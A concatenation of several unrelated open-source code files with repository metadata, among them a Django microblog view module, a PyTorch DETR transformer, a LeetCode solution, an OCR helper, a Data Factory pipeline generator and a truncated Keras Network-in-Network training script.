PostForm\n\ndef attached_images(files, post):\n for field in files.getlist('image'):\n img = PostImage(image=field, post=post)\n img.save()\n\nclass HomeView( \n LoginRequiredMixin, \n View):\n form_class = PostForm\n template_name = 'blog/home.html'\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n # Create Post object but don't save to database yet \n post = form.save(commit=False)\n # Assign the current user to the post\n post.author = request.user\n # Save the post to the database\n post.save()\n # Associate images to current post\n attached_images(request.FILES, post)\n # Trigger action\n create_action(request.user, 'created new post')\n\n return render(request, 'blog/_post.html', {\n 'post': post\n })\n\n return JsonResponse({\n 'errors': form.errors\n }, status=400)\n\n def get(self, request, *args, **kwargs):\n posts = Post.objects.all().order_by('-date_posted')\n # posts_by_popularity = Post.objects.order_by('-total_likes')\n paginator = Paginator(posts, 10)\n page = request.GET.get('page')\n form = self.form_class()\n\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n if request.is_ajax():\n # If the request is AJAX and the page is out of range\n # return an empty page\n return HttpResponse('')\n # If page is out of range deliver last page of results\n posts = paginator.page(paginator.num_pages)\n if request.is_ajax():\n return render(request, 'blog/_post_list.html', {\n 'posts': posts\n })\n return render(request, self.template_name, {\n 'posts': posts,\n 'form': form, \n })\n\nclass PostDeleteView(\n LoginRequiredMixin, \n UserPassesTestMixin, \n DeleteView):\n model = Post\n\n def delete(self, request, *args, **kwargs):\n self.get_object().delete()\n return JsonResponse({\n 'deleted': True\n })\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n@ajax_required\n@login_required\n@require_POST\ndef post_like(request):\n post_id = request.POST.get('id')\n action = request.POST.get('action')\n if post_id and action:\n try:\n post = Post.objects.get(id=post_id)\n if action == 'like':\n post.users_like.add(request.user)\n create_action(request.user, 'liked', post)\n else:\n post.users_like.remove(request.user)\n return JsonResponse({'status':'ok'})\n except:\n pass\n return JsonResponse({'status':'ko'})\n","repo_name":"adavia/microblogger","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19361533838","text":"from copy import deepcopy\nfrom typing import Optional\n\nimport torch\nfrom torch import nn, Tensor\n\n\nclass Transformer(nn.Module):\n def __init__(self, hiddenDims: int, numHead: int, numEncoderLayer: int, numDecoderLayer: int, dimFeedForward: int,\n dropout: float):\n super(Transformer, self).__init__()\n\n encoderLayer = TransformerEncoderLayer(hiddenDims, numHead, dimFeedForward, dropout)\n self.encoder = TransformerEncoder(encoderLayer, numEncoderLayer)\n\n decoderLayer = TransformerDecoderLayer(hiddenDims, numHead, dimFeedForward, dropout)\n self.decoder = TransformerDecoder(decoderLayer, numDecoderLayer)\n\n self.resetParameters()\n\n def resetParameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src: Tensor, mask: Tensor, query: Tensor, pos: Tensor) -> Tensor:\n \"\"\"\n :param src: tensor of shape [batchSize, hiddenDims, imageHeight // 32, imageWidth // 32]\n\n :param mask: tensor of shape [batchSize, imageHeight // 32, imageWidth // 32]\n Please refer to detr.py for more detailed description.\n\n :param query: object queries, tensor of shape [numQuery, hiddenDims].\n\n :param pos: positional encoding, the same shape as src.\n\n :return: tensor of shape [batchSize, numQuery * numDecoderLayer, hiddenDims]\n \"\"\"\n N = src.shape[0]\n\n src = src.flatten(2).permute(2, 0, 1)\n mask = mask.flatten(1)\n pos = pos.flatten(2).permute(2, 0, 1)\n query = query.unsqueeze(1).repeat(1, N, 1)\n tgt = torch.zeros_like(query)\n\n memory = self.encoder(src, srcKeyPaddingMask=mask, pos=pos)\n out = self.decoder(tgt, memory, memoryKeyPaddingMask=mask, pos=pos, queryPos=query).transpose(1, 2)\n\n return out\n\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, encoderLayer: nn.Module, numLayers: int):\n super(TransformerEncoder, self).__init__()\n\n self.layers = getClones(encoderLayer, numLayers)\n\n def forward(self, src: Tensor, mask: Optional[Tensor] = None, srcKeyPaddingMask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None) -> Tensor:\n out = src\n\n for layer in self.layers:\n out = layer(out, mask, srcKeyPaddingMask, pos)\n\n return out\n\n\nclass TransformerDecoder(nn.Module):\n def __init__(self, decoderLayer: nn.Module, numLayers: int):\n super(TransformerDecoder, self).__init__()\n\n self.layers = getClones(decoderLayer, numLayers)\n\n def forward(self, tgt: Tensor, memory: Tensor, tgtMask: Optional[Tensor] = None,\n memoryMask: Optional[Tensor] = None, tgtKeyPaddingMask: Optional[Tensor] = None,\n memoryKeyPaddingMask: Optional[Tensor] = None, pos: Optional[Tensor] = None,\n queryPos: Optional[Tensor] = None) -> Tensor:\n out = tgt\n\n intermediate = []\n\n for layer in self.layers:\n out = layer(out, memory, tgtMask, memoryMask, tgtKeyPaddingMask, memoryKeyPaddingMask, pos, queryPos)\n intermediate.append(out)\n\n return torch.stack(intermediate)\n\n\nclass TransformerEncoderLayer(nn.Module):\n def __init__(self, hiddenDims: int, numHead: int, dimFeedForward: int, dropout: float):\n super(TransformerEncoderLayer, self).__init__()\n\n self.attention = nn.MultiheadAttention(hiddenDims, numHead, dropout=dropout)\n\n self.linear1 = nn.Linear(hiddenDims, dimFeedForward)\n self.linear2 = nn.Linear(dimFeedForward, hiddenDims)\n\n self.norm1 = nn.LayerNorm(hiddenDims)\n self.norm2 = nn.LayerNorm(hiddenDims)\n\n self.dropout = nn.Dropout(dropout)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = nn.ReLU()\n\n def forward(self, src: Tensor, mask: Optional[Tensor] = None, srcKeyPaddingMask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None) -> Tensor:\n q = k = withPosEmbed(src, pos)\n src2 = self.attention(q, k, value=src, attn_mask=mask, key_padding_mask=srcKeyPaddingMask)[0]\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\nclass TransformerDecoderLayer(nn.Module):\n def __init__(self, hiddenDims: int, numHead: int, dimFeedForward: int, dropout: float):\n super(TransformerDecoderLayer, self).__init__()\n\n self.attention1 = nn.MultiheadAttention(hiddenDims, numHead, dropout=dropout)\n self.attention2 = nn.MultiheadAttention(hiddenDims, numHead, dropout=dropout)\n\n self.linear1 = nn.Linear(hiddenDims, dimFeedForward)\n self.linear2 = nn.Linear(dimFeedForward, hiddenDims)\n\n self.norm1 = nn.LayerNorm(hiddenDims)\n self.norm2 = nn.LayerNorm(hiddenDims)\n self.norm3 = nn.LayerNorm(hiddenDims)\n\n self.dropout = nn.Dropout(dropout)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = nn.ReLU()\n\n def forward(self, tgt: Tensor, memory: Tensor, tgtMask: Optional[Tensor] = None,\n memoryMask: Optional[Tensor] = None, tgtKeyPaddingMask: Optional[Tensor] = None,\n memoryKeyPaddingMask: Optional[Tensor] = None, pos: Optional[Tensor] = None,\n queryPos: Optional[Tensor] = None) -> Tensor:\n q = k = withPosEmbed(tgt, queryPos)\n tgt2 = self.attention1(q, k, value=tgt, attn_mask=tgtMask, key_padding_mask=tgtKeyPaddingMask)[0]\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n tgt2 = self.attention2(query=withPosEmbed(tgt, queryPos), key=withPosEmbed(memory, pos),\n value=memory, attn_mask=memoryMask, key_padding_mask=memoryKeyPaddingMask)[0]\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n\ndef withPosEmbed(tensor: Tensor, pos: Optional[Tensor] = None) -> Tensor:\n return tensor + pos if pos is not None else tensor\n\n\ndef getClones(module: nn.Module, N: int) -> nn.ModuleList:\n return nn.ModuleList([deepcopy(module) for _ in range(N)])\n","repo_name":"clive819/Modified-DETR","sub_path":"models/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"32"} +{"seq_id":"71951456411","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 27 10:51:42 2022\r\n\r\n@author: Fan Luo\r\n\"\"\"\r\n\"\"\"\r\n135. Candy\r\n\r\nThere are n children standing in a line. Each child is assigned a rating value given in the integer array ratings.\r\n\r\nYou are giving candies to these children subjected to the following requirements:\r\n\r\nEach child must have at least one candy.\r\nChildren with a higher rating get more candies than their neighbors.\r\nReturn the minimum number of candies you need to have to distribute the candies to the children.\r\n\r\nInput: ratings = [1,0,2]\r\nOutput: 5\r\nExplanation: You can allocate to the first, second and third child with 2, 1, 2 candies respectively.\r\n\"\"\"\r\nclass Solution:\r\n def candy(self, ratings):\r\n n = len(ratings)\r\n res = [1] * n\r\n \r\n # straight traverse\r\n for i in range(n - 1):\r\n if ratings[i] < ratings[i + 1]:\r\n res[i + 1] = 1 + res[i]\r\n \r\n # reverse traverse\r\n for i in range(n - 2, -1, -1):\r\n if ratings[i + 1] < ratings[i]:\r\n #[1,3,4,5,2] case\r\n res[i] = max(res[i],1 + res[i + 1])\r\n \r\n return sum(res)","repo_name":"fanluo12/Leetcode_python","sub_path":"Array/135_Candy.py","file_name":"135_Candy.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69805923293","text":"import json\nimport os\n\n\nclass Prop:\n\n def __init__(self, name, pos):\n \"\"\"type include 1,2,3,4,5,6\"\"\"\n self.name = name\n self.level = 1\n self.exp = 0\n self.need_exp = 10\n self.num = 0\n self.pos = pos\n\n def set_prop_ability(self, attack, defence, health, magic, critical, speed, luck):\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n\n def prop_growth_ability(self, attack, defence, health, magic, critical, speed, luck):\n self.grow_attack = attack\n self.grow_defence = defence\n self.grow_health = health\n self.grow_magic = magic\n self.grow_critical = critical\n self.grow_speed = speed\n self.grow_luck = luck\n\n def growth(self):\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n\n def up_level(self, remainder):\n self.level += 1\n self.need_exp *= 1.5\n self.exp = remainder\n self.growth()\n\n def add_prop_list(self, props_list):\n \"\"\"add a prop to props_list\"\"\"\n dic = {'name': self.name, 'attack': self.attack, 'defence': self.defence, 'health': self.health, 'magic': self.magic,\n 'critical': self.critical, 'speed': self.speed, 'luck': self.luck, 'level': self.level,\n 'exp': self.exp, 'need_exp':self.need_exp, 'grow_attack': self.grow_attack, 'grow_defence': self.grow_defence,\n 'grow_health': self.grow_health, 'grow_magic': self.grow_magic, 'grow_critical': self.grow_critical,\n 'grow_speed': self.grow_speed, 'grow_luck': self.grow_luck, 'num': self.num, 'pos': self.pos}\n props_list.append(dic)\n\n def alter_prop_list(self, props_list):\n \"\"\"alter a prop in contents\"\"\"\n for i in props_list:\n if i['name'] == self.name:\n i['attack'] = self.attack\n i['defence'] = self.defence\n i['health'] = self.health\n i['magic'] = self.magic\n i['critical'] = self.critical\n i['speed'] = self.speed\n i['luck'] = self.luck\n i['level'] = self.level\n i['need_exp'] = self.need_exp\n i['exp'] = self.exp\n i['grow_attack'] = self.grow_attack\n i['grow_defence'] = self.grow_defence\n i['grow_health'] = self.grow_health\n i['grow_magic'] = self.grow_magic\n i['grow_luck'] = self.grow_luck\n i['grow_speed'] = self.grow_speed\n i['grow_critical'] = self.grow_critical\n i['num'] = self.num\n i['pos'] = self.pos\n\n def create_prop(self, attack, defence, health, magic, critical, speed, luck, g_attack, g_defence,\n g_health, g_magic, g_critical, g_speed, g_luck, props_list):\n self.set_prop_ability(attack, defence, health, magic, critical, speed, luck)\n self.prop_growth_ability(g_attack, g_defence, g_health, g_magic, g_critical, g_speed, g_luck)\n self.add_prop_list(props_list)\n\n def get_exp(self, get_exp, props_list):\n self.exp += get_exp\n while self.exp >= self.need_exp:\n remainder = self.exp - self.need_exp\n self.up_level(remainder)\n self.alter_prop_list(props_list)\n\n def get_new_prop(self, props_list):\n for i in props_list:\n if i['name'] == self.name:\n i['num'] += 1\n break\n\n def destroy_prop(self, props_list):\n for i in props_list:\n if i['name'] == self.name:\n if i['num'] > 0:\n i['num'] -= 1\n break\n\n def grow_prop(self, prop, props_list):\n for i in props_list:\n if i['name'] == prop.name:\n i.num -= 1\n if self.name == i['name']:\n exp = prop.need_exp * prop.level\n self.get_exp(exp, props_list)\n\n\ndef load_props(contents, props_list):\n for i in contents['props']:\n p = Prop(i['name'])\n p.set_prop_ability(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'], i['luck'])\n p.prop_growth_ability(i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'], i['grow_critical'],\n i['grow_speed'], i['grow_luck'])\n p.exp = i['exp']\n p.need_exp = i['need_exp']\n p.level = i['level']\n p.num = i['num']\n p.pos = i['pos']\n props_list.append(p)\n\n\ndef down_props(contents, props_list):\n contents['props'] = props_list\n\n\ndef load_file():\n \"\"\"存档读取\"\"\"\n if not os.path.exists('fileSave.json'):\n with open('fileSave.json', 'a') as f:\n characters = []\n drug = []\n props = []\n dic = {'plot': 0, 'money': 0, 'characters': characters, 'drug': drug, 'props': props}\n dic = json.dumps(dic, indent=4, ensure_ascii=False)\n f.write(dic)\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n return contents\n\n\ndef down_file(contents):\n \"\"\"保存存档\"\"\"\n contents = json.dumps(contents, indent=4, ensure_ascii=False)\n with open('fileSave.json', 'w', encoding='utf-8') as file_object:\n \"\"\"覆盖原存档\"\"\"\n file_object.write(contents)\n\n\ncontents = load_file()\nname = str(input('name: '))\npos = int(input('position: '))\nprop = Prop(name, pos)\nattack = int(input('attack: '))\ndefence = int(input('defence: '))\nhealth = int(input('health: '))\nmagic = int(input('magic: '))\ncritical = int(input('critical: '))\nspeed = int(input('speed: '))\nluck = int(input('luck: '))\ng_attack = int(input('grow_attack: '))\ng_defence = int(input('grow_defence: '))\ng_health = int(input('grow_health: '))\ng_magic = int(input('grow_magic: '))\ng_speed = int(input('grow_speed: '))\ng_critical = int(input('grow_critical: '))\ng_luck = int(input('grow_luck: '))\nprop.create_prop(attack, defence, health, magic, critical, speed, luck, g_attack, g_defence,\n g_health, g_magic, g_critical, g_speed, g_luck, contents['props'])\ndown_file(contents)\n","repo_name":"DAZHAdazha/No-names-land","sub_path":"道具生成器.py","file_name":"道具生成器.py","file_ext":"py","file_size_in_byte":6507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26463147464","text":"import collections\nimport json\nfrom os import path, makedirs, remove\nfrom typing import Set\n\nfrom transform_generator.lib.logging import get_logger\nfrom transform_generator.lib.config import get_new_config_structures, get_configs_mappings_from_data_mappings\nfrom transform_generator.lib.dependency_analysis import get_dependency_graph_for_configs, \\\n get_dependency_graph_for_modules\nfrom transform_generator.lib.datafactory.pipeline import generate_main_adf_pipeline\n\nfrom transform_generator.project import Project\n\nlogger = get_logger(__name__)\n\n\ndef generate_pipeline(project_group: list[Project], output_dir: str, project_config_path: str,\n database_param_prefix: str, external_module_config_paths: str, modules: Set[str]):\n config_by_mapping_filename, config_filename_by_target_table, configs_by_config_filename, database_variables, \\\n project_config, mappings_by_mapping_filename = get_new_config_structures(project_group, database_param_prefix,\n project_config_path,\n external_module_config_paths)\n\n config_dependency_graph = get_dependency_graph_for_configs(configs_by_config_filename, mappings_by_mapping_filename,\n config_filename_by_target_table, project_config,\n modules)\n\n module_dependency_graph = get_dependency_graph_for_modules(config_dependency_graph, project_config,\n database_param_prefix, database_variables)\n\n main_pipeline_name = 'core_semantic_transformations'\n main_pipeline_folder = 'ConsumerMain'\n\n if not path.exists(path.join(output_dir, \"ConsumerMain\")):\n makedirs(path.join(output_dir, \"ConsumerMain\"))\n\n if database_variables:\n if database_param_prefix != \"\":\n if path.exists(path.join(output_dir, \"ConsumerMain\", main_pipeline_name + \".json\")):\n remove(path.join(output_dir, \"ConsumerMain\", main_pipeline_name + \".json\"))\n if path.exists(path.join(output_dir, \"ConsumerMain\", \"Main_Data_Pipeline.json\")):\n remove(path.join(output_dir, \"ConsumerMain\", \"Main_Data_Pipeline.json\"))\n main_pipeline_name = database_param_prefix + '_' + main_pipeline_name\n main_pipeline_folder = database_param_prefix\n main_pipeline = generate_main_adf_pipeline(main_pipeline_name, main_pipeline_folder, module_dependency_graph,\n project_config)\n\n with open(path.join(output_dir, \"ConsumerMain\", main_pipeline_name + '.json'), 'w') as outfile:\n json.dump(main_pipeline, outfile, indent=4)\n\n\ndef generate_ddl_orchestration_pipeline(project_group: list[Project], output_dir: str, database_param_prefix: str):\n \"\"\"\n Function to independently create the DDL Orchestration ADF Pipeline\n @param project_group: list of Project objects\n @param output_dir: string path to the directory to save the generated pipeline\n @param project_config_paths: string path to the generator/project level config file\n @param database_param_prefix: A string containing the prefix for the ADF Pipelines if any database parameterization\n flags are Y\n \"\"\"\n _, configs_by_config_filename, project_config, _ = get_configs_mappings_from_data_mappings(project_group)\n\n database_variables = False\n for project_config_entry in project_config.values():\n if project_config_entry.parallel_db_name != '':\n database_variables = True\n\n configs_by_config_filename = collections.OrderedDict(sorted(configs_by_config_filename.items()))\n\n modules = {}\n for config_file_name, configs in configs_by_config_filename.items():\n module_name = project_config[config_file_name].group_name + '_ddl'\n if database_variables:\n module_name = database_param_prefix + '_' + module_name\n modules[module_name] = set()\n\n ddl_pipeline_folder = 'DDL'\n ddl_pipeline_name = 'ddl'\n\n ddl_output_file_path = path.join(output_dir, ddl_pipeline_folder, ddl_pipeline_name + '.json')\n if database_variables:\n if database_param_prefix != \"\" and path.exists(ddl_output_file_path):\n remove(ddl_output_file_path)\n ddl_pipeline_name = database_param_prefix + '_' + ddl_pipeline_name\n ddl_pipeline_folder = database_param_prefix\n ddl_output_file_path = path.join(output_dir, ddl_pipeline_folder, ddl_pipeline_name + '.json')\n\n ddl_pipeline = generate_main_adf_pipeline(ddl_pipeline_name, ddl_pipeline_folder, modules, project_config,\n processing_date=False)\n\n if not path.exists(path.join(output_dir, ddl_pipeline_folder)):\n makedirs(path.join(output_dir, ddl_pipeline_folder))\n with open(ddl_output_file_path, 'w') as outfile:\n json.dump(ddl_pipeline, outfile, indent=4)\n\n\ndef generate_orchestration_pipeline(project_group: list[Project], orchestration_output_dir: str,\n project_config_path: str, database_param_prefix: str = '',\n external_module_config_paths: str = ''):\n output_dir = path.join(orchestration_output_dir, \"datafactory\", \"pipelines\", \"generated\")\n if not path.exists(output_dir):\n makedirs(output_dir)\n\n modules = {project.name for project in project_group}\n\n if project_group:\n generate_pipeline(project_group, output_dir, project_config_path, database_param_prefix,\n external_module_config_paths, modules)\n generate_ddl_orchestration_pipeline(project_group, output_dir, database_param_prefix)\n else:\n logger.warn(\"Orchestration pipeline NOT generated. No configurations defined for this orchestration repository\")\n logger.warn(\"Orchestration DDL pipeline NOT generated. \"\n \"No configurations defined for this orchestration repository or the dependent repositories\")\n","repo_name":"johnsonandjohnson/transformation_generator","sub_path":"transform_generator/lib/datafactory/orchestration_pipeline.py","file_name":"orchestration_pipeline.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"4580511079","text":"GRID_SIZE = 4\nPIECES_NUMBER = 16\nEMPTY_POSITION = '.'\n\n\ndef get_coordinates(position):\n \"\"\"Convert a postion of format 'A3' into coordinates x= 0 and y = 2 in the grid\"\"\"\n if len(position) != 2:\n raise ValueError('Position string does not represent a valid coordinate')\n x = ord(position[0]) - 65\n y = int(position[1]) - 1\n if y < 0 or y >= GRID_SIZE or x < 0 or x >= GRID_SIZE:\n raise ValueError('Coordinate is out of the grid')\n\n return x, y\n","repo_name":"marmelab/quarto-python","sub_path":"src/game/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8204955387","text":"from typing import Any, Dict, List, Union\r\nfrom cnstd import CnStd\r\nfrom cnocr import CnOcr\r\nfrom .common import Box, pil_to_cv\r\nfrom PIL import Image\r\n\r\nstd = CnStd()\r\ncn_ocr = CnOcr()\r\n\r\nOCR_REPL = {'〇': '0', '①': '1', '②': '2', '③': '3', '④': '4',\r\n '⑤': '5', '⑥': '6', '⑦': '7', '⑧': '8', '⑨': '9',\r\n '=': '-', }\r\n\r\n\r\ndef recognize(img: Union[Image.Image, Any], crop: bool = False, repl: Dict[str, str] = {}) -> str:\r\n img = pil_to_cv(img) if isinstance(img, Image.Image) else img\r\n if crop:\r\n box_info_list = std.detect(img)\r\n for box_info in box_info_list:\r\n cropped_img = box_info['cropped_img'] # 检测出的文本框\r\n ocr_res = cn_ocr.ocr_for_single_line(cropped_img)\r\n result = ''.join(ocr_res)\r\n break\r\n else:\r\n result = ''.join(cn_ocr.ocr_for_single_line(img))\r\n\r\n repl = repl.copy()\r\n repl.update(OCR_REPL)\r\n\r\n for origin, replace in repl.items():\r\n result = result.replace(origin, replace)\r\n return result\r\n\r\n\r\ndef detect(img: Union[Image.Image]) -> List[Box]:\r\n img = pil_to_cv(img) if isinstance(img, Image.Image) else img\r\n box_info_list = std.detect(img)\r\n boxes = []\r\n for box_info in box_info_list:\r\n points = list(box_info['box'])\r\n boxes.append(Box(points[0], points[2]))\r\n return boxes\r\n\r\n\r\nif __name__ == \"__main__\":\r\n for item in ['test/num.png', 'pcr/res/ok_white.png', 'pcr/res/fastpass_title.png', 'pcr/res/use_fp.png']:\r\n print(recognize(item))\r\n","repo_name":"qiumuyang/game-auto-script","sub_path":"img/reco.py","file_name":"reco.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16237394830","text":"'''\nNetwork In Network, https://arxiv.org/pdf/1312.4400.pdf\n'''\nimport keras\nimport numpy as np\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten,Lambda\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, AveragePooling2D\nfrom keras.initializers import RandomNormal\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import optimizers\nfrom keras.callbacks import LearningRateScheduler, TensorBoard\nfrom keras import backend as K\nimport utils.load_data as datama\n\n\n\ndef color_preprocessing(x_train,x_test):\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n mean = [125.307, 122.95, 113.865]\n std = [62.9932, 62.0887, 66.7048]\n for i in range(3):\n x_train[:,:,:,i] = (x_train[:,:,:,i] - mean[i]) / std[i]\n x_test[:,:,:,i] = (x_test[:,:,:,i] - mean[i]) / std[i]\n\n return x_train, x_test\n\ndef scheduler_bn(epoch):\n if epoch <= 60:\n return 0.05\n if epoch <= 120:\n return 0.01\n if epoch <= 160:\n return 0.002\n return 0.0004\n\ndef scheduler_nonBn(epoch):\n if epoch <= 80:\n return 0.01\n if epoch <= 140:\n return 0.005\n return 0.001\n\n\ndef build_model_bn(intpu_shape,dropout,weight_decay, drop=False,droprate=0.2):\n model = Sequential()\n model.add(Conv2D(192, (5, 5), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),\n input_shape=intpu_shape, name='l1'))#x_train.shape[1:]))\n model.add(BatchNormalization( name='l2'))\n model.add(Activation('relu',name='l3'))\n model.add(Conv2D(160, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l4'))\n model.add(BatchNormalization(name='l5'))\n model.add(Activation('relu',name='l6'))\n model.add(Conv2D(96, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l7'))\n model.add(BatchNormalization(name='l8'))\n model.add(Activation('relu',name='l9'))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same',name='l10'))\n\n model.add(Dropout(dropout,name='l11'))\n if drop:\n model.add(Lambda(lambda x: K.dropout(x, level=droprate)))\n model.add(Conv2D(192, (5, 5), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l12'))\n model.add(BatchNormalization(name='l13'))\n model.add(Activation('relu',name='l14'))\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l15'))\n model.add(BatchNormalization(name='l16'))\n model.add(Activation('relu',name='l17'))\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l18'))\n model.add(BatchNormalization(name='l20'))\n model.add(Activation('relu',name='l21'))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same',name='l22'))\n\n model.add(Dropout(dropout,name='l23'))\n if drop:\n model.add(Lambda(lambda x: K.dropout(x, level=droprate)))\n model.add(Conv2D(192, (3, 3), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l24'))\n model.add(BatchNormalization(name='l25'))\n model.add(Activation('relu',name='l26'))\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l27'))\n model.add(BatchNormalization(name='l28'))\n model.add(Activation('relu',name='l29'))\n model.add(Conv2D(10, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),name='l30'))\n model.add(BatchNormalization(name='l31'))\n model.add(Activation('relu',name='l32'))\n\n model.add(GlobalAveragePooling2D(name='l33'))\n model.add(Activation('softmax',name='l34'))\n\n sgd = optimizers.SGD(lr=.1, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n return model\n\n\ndef build_model_nonBn(input_shape,dropout,weight_decay,drop=False,droprate=0.2):\n model = Sequential()\n model.add(Conv2D(192, (5, 5), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay),\n input_shape=input_shape, name='l1')) # x_train.shape[1:]))\n model.add(Activation('relu', name='l3'))\n model.add(Conv2D(160, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l4'))\n model.add(Activation('relu', name='l6'))\n if drop:\n model.add(Lambda(lambda x: K.dropout(x, level=droprate)))\n model.add(Conv2D(96, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l7'))\n model.add(Activation('relu', name='l9'))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same', name='l10'))\n model.add(Dropout(dropout, name='l11'))\n if drop:\n model.add(Lambda(lambda x: K.dropout(x, level=droprate)))\n model.add(Conv2D(192, (5, 5), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l12'))\n model.add(Activation('relu', name='l14'))\n\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l15'))\n model.add(Activation('relu', name='l17'))\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l18'))\n\n model.add(Activation('relu', name='l21'))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same', name='l22'))\n model.add(Dropout(dropout, name='l23'))\n if drop:\n model.add(Lambda(lambda x: K.dropout(x, level=droprate)))\n model.add(Conv2D(192, (3, 3), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l24'))\n model.add(Activation('relu', name='l26'))\n model.add(Conv2D(192, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l27'))\n model.add(Activation('relu', name='l29'))\n model.add(Conv2D(10, (1, 1), padding='same', kernel_regularizer=keras.regularizers.l2(weight_decay), name='l30'))\n model.add(Activation('relu', name='l32'))\n\n model.add(GlobalAveragePooling2D(name='l33'))\n model.add(Activation('softmax', name='l34'))\n\n sgd = optimizers.SGD(lr=.1, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n return model\n\nfrom keras import callbacks\n#batch_size = 128\n#epochs = 200\n#num_classes = 10\ndropout = 0.5\nweight_decay = 0.0001\n#log_filepath = './nin_bn'\n\ndef train(dataset='cifar10', name=\"bn\",**kwargs):\n batch_size = kwargs['batch_size'] if 'batch_size' in kwargs else 128\n epochs = kwargs['epochs'] if 'epochs' in kwargs else 300\n dropout = kwargs['dropout'] if 'dropout' in kwargs else 0.5\n weight_decay = kwargs['weight_decay'] if 'weight_decay' in kwargs else 0.0001\n log_filepath = './'+name\n models = {\"bn\":build_model_bn, \"nonBn\":build_model_nonBn}\n schedulers = {\"bn\":scheduler_bn, \"nonBn\":scheduler_nonBn}\n # load data\n if not 'data' in kwargs:\n (x_train, y_train), (x_test, y_test), (img_rows, img_cols, num_classes) = datama.getData(dataset)\n else:\n ((x_train, y_train), (x_test, y_test), num_classes) = kwargs['data']\n img_rows, img_cols = x_train.shape[1], x_train.shape[2]\n\n # build network\n model = models[name](x_train.shape[1:],dropout,weight_decay)\n print(model.summary())\n\n change_lr = LearningRateScheduler(schedulers[name])\n if not 'logfile' in kwargs:\n csvlog = 